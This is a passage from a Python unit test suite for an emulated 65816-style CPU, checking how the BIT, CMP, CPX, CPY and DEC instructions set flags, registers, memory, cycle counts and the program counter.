self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
# BIT Absolute
def test_bit_abs_copies_bit_7_of_memory_to_n_flag_when_0(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.NEGATIVE)
# $0000 BIT $FEED
self._write(mpu.memory, 0x0000, (0x2C, 0xED, 0xFE))
self._write(mpu.memory, 0xFEED, (0xFF, 0xFF))
mpu.a = 0xFF
mpu.step()
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
def test_bit_abs_copies_bit_7_of_memory_to_n_flag_when_1(self):
mpu = self._make_mpu()
mpu.p |= mpu.NEGATIVE
# $0000 BIT $FEED
self._write(mpu.memory, 0x0000, (0x2C, 0xED, 0xFE))
self._write(mpu.memory, 0xFEED, (0x00, 0x00))
mpu.a = 0xFF
mpu.step()
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
def test_bit_abs_copies_bit_6_of_memory_to_v_flag_when_0(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.OVERFLOW)
# $0000 BIT $FEED
self._write(mpu.memory, 0x0000, (0x2C, 0xED, 0xFE))
self._write(mpu.memory, 0xFEED, (0xFF, 0xFF))
mpu.a = 0xFF
mpu.step()
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_bit_abs_copies_bit_6_of_memory_to_v_flag_when_1(self):
mpu = self._make_mpu()
mpu.p |= mpu.OVERFLOW
# $0000 BIT $FEED
self._write(mpu.memory, 0x0000, (0x2C, 0xED, 0xFE))
self._write(mpu.memory, 0xFEED, (0x00, 0x00))
mpu.a = 0xFF
mpu.step()
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_bit_abs_stores_result_of_and_in_z_preserves_a_when_1(self):
mpu = self._make_mpu()
mpu.p &= ~mpu.ZERO
# $0000 BIT $FEED
self._write(mpu.memory, 0x0000, (0x2C, 0xED, 0xFE))
self._write(mpu.memory, 0xFEED, (0x00, 0x00))
mpu.a = 0x01
mpu.step()
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0x01, mpu.a)
self.assertEqual(0x00, mpu.memory[0xFEED])
def test_bit_abs_stores_result_of_and_when_nonzero_in_z_preserves_a(self):
mpu = self._make_mpu()
mpu.p |= mpu.ZERO
# $0000 BIT $FEED
self._write(mpu.memory, 0x0000, (0x2C, 0xED, 0xFE))
self._write(mpu.memory, 0xFEED, (0x01, 0x00))
mpu.a = 0x01
mpu.step()
self.assertEqual(0, mpu.p & mpu.ZERO) # result of AND is non-zero
self.assertEqual(0x01, mpu.a)
self.assertEqual(0x01, mpu.memory[0xFEED])
def test_bit_abs_stores_result_of_and_when_zero_in_z_preserves_a(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.ZERO)
# $0000 BIT $FEED
self._write(mpu.memory, 0x0000, (0x2C, 0xED, 0xFE))
self._write(mpu.memory, 0xFEED, (0x00, 0x00))
mpu.a = 0x01
mpu.step()
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO) # result of AND is zero
self.assertEqual(0x01, mpu.a)
self.assertEqual(0x00, mpu.memory[0xFEED])
# BIT Absolute, X-Indexed
def test_bit_abs_x_copies_bit_7_of_memory_to_n_flag_when_0(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.NEGATIVE)
mpu.x = 0x02
# $0000 BIT $FEEB,X
self._write(mpu.memory, 0x0000, (0x3C, 0xEB, 0xFE))
self._write(mpu.memory, 0xFEED, (0xFF, 0xFF))
mpu.a = 0xFF
mpu.step()
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(4, mpu.processorCycles)
self.assertEqual(0x0003, mpu.pc)
def test_bit_abs_x_copies_bit_7_of_memory_to_n_flag_when_1(self):
mpu = self._make_mpu()
mpu.p |= mpu.NEGATIVE
mpu.x = 0x02
# $0000 BIT $FEEB,X
self._write(mpu.memory, 0x0000, (0x3C, 0xEB, 0xFE))
self._write(mpu.memory, 0xFEED, (0x00, 0x00))
mpu.a = 0xFF
mpu.step()
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(4, mpu.processorCycles)
self.assertEqual(0x0003, mpu.pc)
def test_bit_abs_x_copies_bit_6_of_memory_to_v_flag_when_0(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.OVERFLOW)
mpu.x = 0x02
# $0000 BIT $FEEB,X
self._write(mpu.memory, 0x0000, (0x3C, 0xEB, 0xFE))
self._write(mpu.memory, 0xFEED, (0xFF, 0xFF))
mpu.a = 0xFF
mpu.step()
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
self.assertEqual(4, mpu.processorCycles)
self.assertEqual(0x0003, mpu.pc)
def test_bit_abs_x_copies_bit_6_of_memory_to_v_flag_when_1(self):
mpu = self._make_mpu()
mpu.p |= mpu.OVERFLOW
mpu.x = 0x02
# $0000 BIT $FEEB,X
self._write(mpu.memory, 0x0000, (0x3C, 0xEB, 0xFE))
self._write(mpu.memory, 0xFEED, (0x00, 0x00))
mpu.a = 0xFF
mpu.step()
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
self.assertEqual(4, mpu.processorCycles)
self.assertEqual(0x0003, mpu.pc)
def test_bit_abs_x_stores_result_of_and_in_z_preserves_a_when_1(self):
mpu = self._make_mpu()
mpu.p &= ~mpu.ZERO
mpu.x = 0x02
# $0000 BIT $FEEB,X
self._write(mpu.memory, 0x0000, (0x3C, 0xEB, 0xFE))
self._write(mpu.memory, 0xFEED, (0x00, 0x00))
mpu.a = 0x01
mpu.step()
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0x01, mpu.a)
self.assertEqual(0x00, mpu.memory[0xFEED])
self.assertEqual(4, mpu.processorCycles)
self.assertEqual(0x0003, mpu.pc)
def test_bit_abs_x_stores_result_of_and_nonzero_in_z_preserves_a(self):
mpu = self._make_mpu()
mpu.p |= mpu.ZERO
mpu.x = 0x02
# $0000 BIT $FEEB,X
self._write(mpu.memory, 0x0000, (0x3C, 0xEB, 0xFE))
self._write(mpu.memory, 0xFEED, (0x01, 0x00))
mpu.a = 0x01
mpu.step()
self.assertEqual(0, mpu.p & mpu.ZERO) # result of AND is non-zero
self.assertEqual(0x01, mpu.a)
self.assertEqual(0x01, mpu.memory[0xFEED])
self.assertEqual(4, mpu.processorCycles)
self.assertEqual(0x0003, mpu.pc)
def test_bit_abs_x_stores_result_of_and_when_zero_in_z_preserves_a(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.ZERO)
mpu.x = 0x02
# $0000 BIT $FEEB,X
self._write(mpu.memory, 0x0000, (0x3C, 0xEB, 0xFE))
self._write(mpu.memory, 0xFEED, (0x00, 0x00))
mpu.a = 0x01
mpu.step()
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO) # result of AND is zero
self.assertEqual(0x01, mpu.a)
self.assertEqual(0x00, mpu.memory[0xFEED])
self.assertEqual(4, mpu.processorCycles)
self.assertEqual(0x0003, mpu.pc)
# BIT Direct Page
def test_bit_dp_copies_bit_7_of_memory_to_n_flag_when_0(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.NEGATIVE)
# $0000 BIT $0010
self._write(mpu.memory, 0x0000, (0x24, 0x10))
self._write(mpu.memory, 0x0010, (0xFF, 0xFF))
mpu.a = 0xFF
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(3, mpu.processorCycles)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
def test_bit_dp_copies_bit_7_of_memory_to_n_flag_when_1(self):
mpu = self._make_mpu()
mpu.p |= mpu.NEGATIVE
# $0000 BIT $0010
self._write(mpu.memory, 0x0000, (0x24, 0x10))
self._write(mpu.memory, 0x0010, (0x00, 0x00))
mpu.a = 0xFF
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(3, mpu.processorCycles)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
def test_bit_dp_copies_bit_6_of_memory_to_v_flag_when_0(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.OVERFLOW)
# $0000 BIT $0010
self._write(mpu.memory, 0x0000, (0x24, 0x10))
self._write(mpu.memory, 0x0010, (0xFF, 0xFF))
mpu.a = 0xFF
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(3, mpu.processorCycles)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_bit_dp_copies_bit_6_of_memory_to_v_flag_when_1(self):
mpu = self._make_mpu()
mpu.p |= mpu.OVERFLOW
# $0000 BIT $0010
self._write(mpu.memory, 0x0000, (0x24, 0x10))
self._write(mpu.memory, 0x0010, (0x00, 0x00))
mpu.a = 0xFF
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(3, mpu.processorCycles)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_bit_dp_stores_result_of_and_in_z_preserves_a_when_1(self):
mpu = self._make_mpu()
mpu.p &= ~mpu.ZERO
# $0000 BIT $0010
self._write(mpu.memory, 0x0000, (0x24, 0x10))
self._write(mpu.memory, 0x0010, (0x00, 0x00))
mpu.a = 0x01
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(3, mpu.processorCycles)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0x01, mpu.a)
self.assertEqual(0x00, mpu.memory[0x0010])
def test_bit_dp_stores_result_of_and_when_nonzero_in_z_preserves_a(self):
mpu = self._make_mpu()
mpu.p |= mpu.ZERO
# $0000 BIT $0010
self._write(mpu.memory, 0x0000, (0x24, 0x10))
self._write(mpu.memory, 0x0010, (0x01, 0x00))
mpu.a = 0x01
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(3, mpu.processorCycles)
self.assertEqual(0, mpu.p & mpu.ZERO) # result of AND is non-zero
self.assertEqual(0x01, mpu.a)
self.assertEqual(0x01, mpu.memory[0x0010])
def test_bit_dp_stores_result_of_and_when_zero_in_z_preserves_a(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.ZERO)
# $0000 BIT $0010
self._write(mpu.memory, 0x0000, (0x24, 0x10))
self._write(mpu.memory, 0x0010, (0x00, 0x00))
mpu.a = 0x01
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(3, mpu.processorCycles)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO) # result of AND is zero
self.assertEqual(0x01, mpu.a)
self.assertEqual(0x00, mpu.memory[0x0010])
# BIT Direct Page, X-Indexed
def test_bit_dp_x_copies_bit_7_of_memory_to_n_flag_when_0(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.NEGATIVE)
# $0000 BIT $0010,X
self._write(mpu.memory, 0x0000, (0x34, 0x10))
self._write(mpu.memory, 0x0013, (0xFF, 0xFF))
mpu.x = 0x03
mpu.a = 0xFF
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(4, mpu.processorCycles)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
def test_bit_dp_x_copies_bit_7_of_memory_to_n_flag_when_1(self):
mpu = self._make_mpu()
mpu.p |= mpu.NEGATIVE
# $0000 BIT $0010,X
self._write(mpu.memory, 0x0000, (0x34, 0x10))
self._write(mpu.memory, 0x0013, (0x00, 0x00))
mpu.x = 0x03
mpu.a = 0xFF
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(4, mpu.processorCycles)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
def test_bit_dp_x_copies_bit_6_of_memory_to_v_flag_when_0(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.OVERFLOW)
# $0000 BIT $0010,X
self._write(mpu.memory, 0x0000, (0x34, 0x10))
self._write(mpu.memory, 0x0013, (0xFF, 0xFF))
mpu.x = 0x03
mpu.a = 0xFF
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(4, mpu.processorCycles)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_bit_dp_x_copies_bit_6_of_memory_to_v_flag_when_1(self):
mpu = self._make_mpu()
mpu.p |= mpu.OVERFLOW
# $0000 BIT $0010,X
self._write(mpu.memory, 0x0000, (0x34, 0x10))
self._write(mpu.memory, 0x0013, (0x00, 0x00))
mpu.x = 0x03
mpu.a = 0xFF
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(4, mpu.processorCycles)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_bit_dp_x_stores_result_of_and_in_z_preserves_a_when_1(self):
mpu = self._make_mpu()
mpu.p &= ~mpu.ZERO
# $0000 BIT $0010,X
self._write(mpu.memory, 0x0000, (0x34, 0x10))
self._write(mpu.memory, 0x0013, (0x00, 0x00))
mpu.x = 0x03
mpu.a = 0x01
mpu.step()
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(4, mpu.processorCycles)
self.assertEqual(0x01, mpu.a)
self.assertEqual(0x00, mpu.memory[0x0010 + mpu.x])
def test_bit_dp_x_stores_result_of_and_when_nonzero_in_z_preserves_a(self):
mpu = self._make_mpu()
mpu.p |= mpu.ZERO
# $0000 BIT $0010,X
self._write(mpu.memory, 0x0000, (0x34, 0x10))
self._write(mpu.memory, 0x0013, (0x01, 0x00))
mpu.x = 0x03
mpu.a = 0x01
mpu.step()
self.assertEqual(0, mpu.p & mpu.ZERO) # result of AND is non-zero
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(4, mpu.processorCycles)
self.assertEqual(0x01, mpu.a)
self.assertEqual(0x01, mpu.memory[0x0010 + mpu.x])
def test_bit_dp_x_stores_result_of_and_when_zero_in_z_preserves_a(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.ZERO)
# $0000 BIT $0010,X
self._write(mpu.memory, 0x0000, (0x34, 0x10))
self._write(mpu.memory, 0x0013, (0x00, 0x00))
mpu.x = 0x03
mpu.a = 0x01
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(4, mpu.processorCycles)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO) # result of AND is zero
self.assertEqual(0x01, mpu.a)
self.assertEqual(0x00, mpu.memory[0x0010 + mpu.x])
# BIT Immediate
def test_bit_imm_does_not_affect_n_and_z_flags(self):
mpu = self._make_mpu()
mpu.p |= mpu.NEGATIVE | mpu.OVERFLOW
# $0000 BIT #$FFFF
self._write(mpu.memory, 0x0000, (0x89, 0xff, 0xff))
mpu.a = 0x00
mpu.step()
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
self.assertEqual(0x00, mpu.a)
self.assertEqual(2, mpu.processorCycles)
self.assertEqual(0x03, mpu.pc)
def test_bit_imm_stores_result_of_and_in_z_preserves_a_when_1(self):
mpu = self._make_mpu()
mpu.p &= ~mpu.ZERO
# $0000 BIT #$0000
self._write(mpu.memory, 0x0000, (0x89, 0x00, 0x00))
mpu.a = 0x01
mpu.step()
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0x01, mpu.a)
self.assertEqual(2, mpu.processorCycles)
self.assertEqual(0x03, mpu.pc)
def test_bit_imm_stores_result_of_and_when_nonzero_in_z_preserves_a(self):
mpu = self._make_mpu()
mpu.p |= mpu.ZERO
# $0000 BIT #$0001
self._write(mpu.memory, 0x0000, (0x89, 0x01, 0x00))
mpu.a = 0x01
mpu.step()
self.assertEqual(0, mpu.p & mpu.ZERO) # result of AND is non-zero
self.assertEqual(0x01, mpu.a)
self.assertEqual(2, mpu.processorCycles)
self.assertEqual(0x03, mpu.pc)
def test_bit_imm_stores_result_of_and_when_zero_in_z_preserves_a(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.ZERO)
# $0000 BIT #$0000
self._write(mpu.memory, 0x0000, (0x89, 0x00, 0x00))
mpu.a = 0x01
mpu.step()
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO) # result of AND is zero
self.assertEqual(0x01, mpu.a)
self.assertEqual(2, mpu.processorCycles)
self.assertEqual(0x03, mpu.pc)
# Compare instructions
# See http://6502.org/tutorials/compare_instructions.html
# and http://www.6502.org/tutorials/compare_beyond.html
# Cheat sheet:
#
# - Comparison is actually subtraction "register - memory"
# - Z contains equality result (1 equal, 0 not equal)
# - C contains result of unsigned comparison (0 if A<m, 1 if A>=m)
# - N holds MSB of subtraction result (*NOT* of signed subtraction)
# - V is not affected by comparison
# - D has no effect on comparison
# CMP Immediate
def test_cmp_imm_sets_zero_carry_clears_neg_flags_if_equal(self):
"""Comparison: A == m"""
mpu = self._make_mpu()
# $0000 CMP #10 , A will be 0x1010
self._write(mpu.memory, 0x0000, (0xC9, 0x10, 0x10))
mpu.a = 0x1010
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
def test_cmp_imm_clears_zero_carry_takes_neg_if_less_unsigned(self):
"""Comparison: A < m (unsigned)"""
mpu = self._make_mpu()
# $0000 CMP #10 , A will be 1
self._write(mpu.memory, 0x0000, (0xC9, 0x10, 0x10))
mpu.a = 1
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE) # 0x01-0x0A=0xF7
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.CARRY)
def test_cmp_imm_clears_zero_sets_carry_takes_neg_if_less_signed(self):
"""Comparison: A < #nn (signed), A negative"""
mpu = self._make_mpu()
# $0000 CMP #1, A will be -1 (0xFFFF)
self._write(mpu.memory, 0x0000, (0xC9, 0x01, 0x00))
mpu.a = 0xFFFF
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE) # 0xFFFF-0x0001=0xFFFE
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY) # A>m unsigned
def test_cmp_imm_clears_zero_carry_takes_neg_if_less_signed_nega(self):
"""Comparison: A < m (signed), A and m both negative"""
mpu = self._make_mpu()
# $0000 CMP #0xFFFF (-1), A will be -2 (0xFFFE)
self._write(mpu.memory, 0x0000, (0xC9, 0xFF, 0xFF))
mpu.a = 0xFFFE
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE) # 0xFE-0xFF=0xFF
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.CARRY) # A<m unsigned
def test_cmp_imm_clears_zero_sets_carry_takes_neg_if_more_unsigned(self):
"""Comparison: A > m (unsigned)"""
mpu = self._make_mpu()
# $0000 CMP #1 , A will be 10
self._write(mpu.memory, 0x0000, (0xC9, 0X01, 0X00))
mpu.a = 10
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0, mpu.p & mpu.NEGATIVE) # 0x0A-0x01 = 0x09
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY) # A>m unsigned
def test_cmp_imm_clears_zero_carry_takes_neg_if_more_signed(self):
"""Comparison: A > m (signed), memory negative"""
mpu = self._make_mpu()
# $0000 CMP #$FFFF (-1), A will be 2
self._write(mpu.memory, 0x0000, (0xC9, 0xFF, 0XFF))
mpu.a = 2
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0, mpu.p & mpu.NEGATIVE) # 0x02-0xFF=0x01
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.CARRY) # A<m unsigned
def test_cmp_imm_clears_zero_carry_takes_neg_if_more_signed_nega(self):
"""Comparison: A > m (signed), A and m both negative"""
mpu = self._make_mpu()
# $0000 CMP #$FFFE (-2), A will be -1 (0xFFFF)
self._write(mpu.memory, 0x0000, (0xC9, 0xFE, 0xFF))
mpu.a = 0xFFFF
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0, mpu.p & mpu.NEGATIVE) # 0xFF-0xFE=0x01
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY) # A>m unsigned
# CMP Direct Page, Indirect
def test_cmp_dpi_sets_z_flag_if_equal(self):
mpu = self._make_mpu()
mpu.a = 0x42FF
# $0000 AND ($10)
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0xd2, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0xFF, 0x42))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(5, mpu.processorCycles)
self.assertEqual(0x42FF, mpu.a)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
def test_cmp_dpi_resets_z_flag_if_unequal(self):
mpu = self._make_mpu()
mpu.a = 0x43FF
# $0000 AND ($10)
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0xd2, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0xFF, 0x42))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(5, mpu.processorCycles)
self.assertEqual(0x43FF, mpu.a)
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
# CPX Immediate
def test_cpx_imm_sets_zero_carry_clears_neg_flags_if_equal(self):
"""Comparison: X == m"""
mpu = self._make_mpu()
# $0000 CPX #$20ff
self._write(mpu.memory, 0x0000, (0xE0, 0xff, 0x20))
mpu.x = 0x20ff
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
# CPY Immediate
def test_cpy_imm_sets_zero_carry_clears_neg_flags_if_equal(self):
"""Comparison: Y == m"""
mpu = self._make_mpu()
# $0000 CPY #$30ff
self._write(mpu.memory, 0x0000, (0xC0, 0xff, 0x30))
mpu.y = 0x30ff
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
# DEC Absolute
def test_dec_abs_decrements_memory(self):
mpu = self._make_mpu()
# $0000 DEC 0xABCD
self._write(mpu.memory, 0x0000, (0xCE, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x10, 0x10))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x0F, mpu.memory[0xABCD])
self.assertEqual(0x10, mpu.memory[0xABCD+1])
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_dec_abs_below_00_rolls_over_and_sets_negative_flag(self):
mpu = self._make_mpu()
# $0000 DEC 0xABCD
self._write(mpu.memory, 0x0000, (0xCE, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0xFF, mpu.memory[0xABCD])
self.assertEqual(0xFF, mpu.memory[0xABCD+1])
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
def test_dec_abs_sets_zero_flag_when_decrementing_to_zero(self):
mpu = self._make_mpu()
# $0000 DEC 0xABCD
self._write(mpu.memory, 0x0000, (0xCE, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.memory[0xABCD])
self.assertEqual(0x00, mpu.memory[0xABCD+1])
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
# DEC Accumulator
def test_dec_a_decreases_a(self):
mpu = self._make_mpu()
# $0000 DEC
self._write(mpu.memory, 0x0000, [0x3A])
mpu.a = 0x0148
mpu.step()
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0x0147, mpu.a)
def test_dec_a_sets_zero_flag(self):
mpu = self._make_mpu()
# $0000 DEC
self._write(mpu.memory, 0x0000, [0x3A])
mpu.a = 0x01
mpu.step()
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0x00, mpu.a)
def test_dec_a_wraps_at_zero(self):
mpu = self._make_mpu()
# $0000 DEC
self._write(mpu.memory, 0x0000, [0x3A])
mpu.a = 0x00
mpu.step()
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0xffFF, mpu.a)
# DEC Direct Page
def test_dec_dp_decrements_memory(self):
mpu = self._make_mpu()
# $0000 DEC 0x0010
self._write(mpu.memory, 0x0000, (0xC6, 0x10))
self._write(mpu.memory, 0x0010, (0x10, 0x10))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x0F, mpu.memory[0x0010])
self.assertEqual(0x10, mpu.memory[0x0010+1])
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_dec_dp_below_00_rolls_over_and_sets_negative_flag(self):
mpu = self._make_mpu()
# $0000 DEC 0x0010
self._write(mpu.memory, 0x0000, (0xC6, 0x10))
self._write(mpu.memory, 0x0010, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0xFF, mpu.memory[0x0010])
self.assertEqual(0xFF, mpu.memory[0x0010+1])
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
def test_dec_dp_sets_zero_flag_when_decrementing_to_zero(self):
mpu = self._make_mpu()
# $0000 DEC 0x0010
self._write(mpu.memory, 0x0000, (0xC6, 0x10))
self._write(mpu.memory, 0x0010, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x00, mpu.memory[0x0010])
self.assertEqual(0x00, mpu.memory[0x0010+1])
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
# DEC Absolute, X-Indexed
def test_dec_abs_x_decrements_memory(self):
mpu = self._make_mpu()
# $0000 DEC 0xABCD,X
self._write(mpu.memory, 0x0000, (0xDE, 0xCD, 0xAB))
mpu.x = 0x03
self._write(mpu.memory, 0xABCD + mpu.x, (0x10, 0x10))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x0F, mpu.memory[0xABCD + mpu.x])
self.assertEqual(0x10, mpu.memory[0xABCD + 1 + mpu.x])
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_dec_abs_x_below_00_rolls_over_and_sets_negative_flag(self):
mpu = self._make_mpu()
# $0000 DEC 0xABCD,X
self._write(mpu.memory, 0x0000, (0xDE, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.x, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0xFF, mpu.memory[0xABCD + mpu.x])
self.assertEqual(0xFF, mpu.memory[0xABCD + 1 + mpu.x])
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
def test_dec_abs_x_sets_zero_flag_when_decrementing_to_zero(self):
mpu = self._make_mpu()
# $0000 DEC 0xABCD,X
self._write(mpu.memory, 0x0000, (0xDE, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.x, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.memory[0xABCD + mpu.x])
self.assertEqual(0x00, mpu.memory[0xABCD + 1 + mpu.x])
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
# DEC Direct Page, X-Indexed
def test_dec_dp_x_decrements_memory(self):
mpu = self._make_mpu()
# $0000 DEC 0x0010,X
self._write(mpu.memory, 0x0000, (0xD6, 0x10))
mpu.x = 0x03
self._write(mpu.memory, 0x0010 + mpu.x, (0x10, 0x10))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x0F, mpu.memory[0x0010 + mpu.x])
self.assertEqual(0x10, mpu.memory[0x0010 + 1 + mpu.x])
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_dec_dp_x_below_00_rolls_over_and_sets_negative_flag(self):
mpu = self._make_mpu()
# $0000 DEC 0x0010,X
self._write(mpu.memory, 0x0000, (0xD6, 0x10))
mpu.x = 0x03
self._write(mpu.memory, 0x0010 + mpu.x, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0xFF, mpu.memory[0x0010 + mpu.x])
self.assertEqual(0xFF, mpu.memory[0x0010 + 1 + mpu.x])
